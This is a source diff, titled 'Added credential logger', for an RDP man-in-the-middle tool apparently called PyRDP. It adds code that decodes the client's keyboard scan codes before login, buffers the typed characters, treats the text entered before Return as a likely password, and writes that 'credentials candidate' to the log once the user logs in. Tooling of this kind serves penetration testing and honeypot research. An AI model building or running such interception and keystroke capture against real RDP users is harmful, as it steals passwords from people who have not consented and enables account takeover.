Added credential logger

pyrdp/mitm/DeviceRedirectionMITM.py

@@ -11,12 +11,13 @@
 from typing import Dict, Optional, Union
 
 from pyrdp.core import FileProxy, ObservedBy, Observer, Subject
-from pyrdp.enum import CreateOption, DeviceType, DirectoryAccessMask, FileAccessMask, FileAttributes, \
+from pyrdp.enum import CreateOption, DeviceRedirectionPacketID, DeviceType, DirectoryAccessMask, FileAccessMask, FileAttributes, \
     FileCreateDisposition, FileCreateOptions, FileShareAccess, FileSystemInformationClass, IOOperationSeverity, \
     MajorFunction, MinorFunction
 from pyrdp.layer import DeviceRedirectionLayer
 from pyrdp.mitm.config import MITMConfig
 from pyrdp.mitm.FileMapping import FileMapping, FileMappingDecoder, FileMappingEncoder
+from pyrdp.mitm.state import RDPMITMState
 from pyrdp.pdu import DeviceAnnounce, DeviceCloseRequestPDU, DeviceCloseResponsePDU, DeviceCreateRequestPDU, \
     DeviceCreateResponsePDU, DeviceDirectoryControlResponsePDU, DeviceIORequestPDU, DeviceIOResponsePDU, \
     DeviceListAnnounceRequest, DeviceQueryDirectoryRequestPDU, DeviceQueryDirectoryResponsePDU, DeviceReadRequestPDU, \
@@ -53,7 +54,7 @@ class DeviceRedirectionMITM(Subject):
     FORGED_COMPLETION_ID = 1000000
 
 
-    def __init__(self, client: DeviceRedirectionLayer, server: DeviceRedirectionLayer, log: LoggerAdapter, config: MITMConfig):
+    def __init__(self, client: DeviceRedirectionLayer, server: DeviceRedirectionLayer, log: LoggerAdapter, config: MITMConfig, state: RDPMITMState):
         """
         :param client: device redirection layer for the client side
         :param server: device redirection layer for the server side
@@ -64,6 +65,7 @@ def __init__(self, client: DeviceRedirectionLayer, server: DeviceRedirectionLaye
 
         self.client = client
         self.server = server
+        self.state = state
         self.log = log
         self.config = config
         self.currentIORequests: Dict[int, DeviceIORequestPDU] = {}
@@ -128,6 +130,10 @@ def handlePDU(self, pdu: DeviceRedirectionPDU, destination: DeviceRedirectionLay
         elif isinstance(pdu, DeviceListAnnounceRequest):
             self.handleDeviceListAnnounceRequest(pdu)
 
+        elif isinstance(pdu, DeviceRedirectionPDU):
+            if pdu.packetID == DeviceRedirectionPacketID.PAKID_CORE_USER_LOGGEDON:
+                self.handleClientLogin()
+
         if not dropPDU:
             destination.sendPDU(pdu)
 
@@ -270,6 +276,22 @@ def handleCloseResponse(self, request: DeviceCloseRequestPDU, _: DeviceCloseResp
             self.saveMapping()
 
 
+    def handleClientLogin(self):
+        """
+        Handle events that should be triggered when a client logs in.
+        """
+
+        if self.state.credentialsCandidate or self.state.inputBuffer:
+            self.log.info("Credentials candidate from heuristic: %(credentials_candidate)s", {"credentials_candidate" : (self.state.credentialsCandidate or self.state.inputBuffer) })
+
+        # Deactivate the logger for this client
+        self.state.loggedIn = True
+        self.state.shiftPressed = False
+        self.state.capsLockOn = False
+        self.state.credentialsCandidate = ""
+        self.state.inputBuffer = ""
+
+
     def findNextRequestID(self) -> int:
         """
         Find the next request ID to be returned for a forged request. Request ID's start from a different base than the

pyrdp/mitm/FastPathMITM.py

@@ -6,7 +6,9 @@
 
 from pyrdp.layer import FastPathLayer
 from pyrdp.mitm.state import RDPMITMState
-from pyrdp.pdu import FastPathPDU
+from pyrdp.pdu import FastPathPDU, FastPathScanCodeEvent
+from pyrdp.player import keyboard
+from pyrdp.enum import ScanCode
 
 
 class FastPathMITM:
@@ -37,6 +39,45 @@ def onClientPDUReceived(self, pdu: FastPathPDU):
         if self.state.forwardInput:
             self.server.sendPDU(pdu)
 
+        if not self.state.loggedIn:
+            for event in pdu.events:
+                if isinstance(event, FastPathScanCodeEvent):
+                    self.onScanCode(event.scanCode, event.isReleased, event.rawHeaderByte & keyboard.KBDFLAGS_EXTENDED != 0)
+
     def onServerPDUReceived(self, pdu: FastPathPDU):
         if self.state.forwardOutput:
-            self.client.sendPDU(pdu)
+            self.client.sendPDU(pdu)
+
+    def onScanCode(self, scanCode: int, isReleased: bool, isExtended: bool):
+        """
+        Handle scan code.
+        """
+        keyName = keyboard.getKeyName(scanCode, isExtended, self.state.shiftPressed, self.state.capsLockOn)
+        scanCodeTuple = (scanCode, isExtended)
+
+        # Left or right shift
+        if scanCodeTuple in [ScanCode.LSHIFT, ScanCode.RSHIFT]:
+            self.state.shiftPressed = not isReleased
+        # Caps lock
+        elif scanCodeTuple == ScanCode.CAPSLOCK and not isReleased:
+            self.state.capsLockOn = not self.state.capsLockOn
+        # Control
+        elif scanCodeTuple in [ScanCode.LCONTROL, ScanCode.RCONTROL]:
+            self.state.ctrlPressed = not isReleased
+        # Backspace
+        elif scanCodeTuple == ScanCode.BACKSPACE and not isReleased:
+            self.state.inputBuffer += "<\\b>"
+        # Tab
+        elif scanCodeTuple == ScanCode.TAB and not isReleased:
+            self.state.inputBuffer += "<\\t>"
+        # CTRL + A
+        elif scanCodeTuple == ScanCode.KEY_A and self.state.ctrlPressed and not isReleased:
+            self.state.inputBuffer += "<ctrl-a>"
+        # Return
+        elif scanCodeTuple == ScanCode.RETURN and not isReleased:
+            self.state.credentialsCandidate = self.state.inputBuffer
+            self.state.inputBuffer = ""
+        # Normal input
+        elif len(keyName) == 1:
+            if not isReleased:
+                self.state.inputBuffer += keyName

pyrdp/mitm/mitm.py

@@ -297,7 +297,7 @@ def buildDeviceChannel(self, client: MCSServerChannel, server: MCSClientChannel)
         LayerChainItem.chain(client, clientSecurity, clientVirtualChannel, clientLayer)
         LayerChainItem.chain(server, serverSecurity, serverVirtualChannel, serverLayer)
 
-        deviceRedirection = DeviceRedirectionMITM(clientLayer, serverLayer, self.getLog(MCSChannelName.DEVICE_REDIRECTION), self.config)
+        deviceRedirection = DeviceRedirectionMITM(clientLayer, serverLayer, self.getLog(MCSChannelName.DEVICE_REDIRECTION), self.config, self.state)
         self.channelMITMs[client.channelID] = deviceRedirection
 
         if self.attacker:

pyrdp/mitm/state.py

@@ -51,6 +51,24 @@ def __init__(self):
         self.forwardOutput = True
         """Whether output from the server should be forwarded to the client"""
 
+        self.loggedIn = False
+        """Keep tracks of the client login status"""
+
+        self.inputBuffer = ""
+        """Used to store what the client types"""
+
+        self.credentialsCandidate = ""
+        """The potential client password"""
+
+        self.shiftPressed = False
+        """The current keyboard shift state"""
+
+        self.capsLockOn = False
+        """The current keyboard capsLock state"""
+
+        self.ctrlPressed = False
+        """The current keybaord ctrl state"""
+
         self.securitySettings.addObserver(self.crypters[ParserMode.CLIENT])
         self.securitySettings.addObserver(self.crypters[ParserMode.SERVER])
 

pyrdp/player/PlayerEventHandler.py

@@ -185,7 +185,7 @@ def onFastPathInput(self, pdu: PlayerPDU):
             elif isinstance(event, FastPathMouseEvent):
                 self.onMouse(event)
             elif isinstance(event, FastPathScanCodeEvent):
-                self.onScanCode(event.scanCode, event.isReleased, event.rawHeaderByte & 2 != 0)
+                self.onScanCode(event.scanCode, event.isReleased, event.rawHeaderByte & keyboard.KBDFLAGS_EXTENDED != 0)
 
 
     def onUnicode(self, event: FastPathUnicodeEvent):

pyrdp/player/keyboard.py

@@ -9,6 +9,9 @@
 from PySide2.QtCore import Qt
 from PySide2.QtGui import QKeyEvent
 
+# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/089d362b-31eb-4a1a-b6fa-92fe61bb5dbf
+KBDFLAGS_EXTENDED = 2
+
 SCANCODE_MAPPING = {
     Qt.Key.Key_Escape: 0x01,
     Qt.Key.Key_1: 0x02,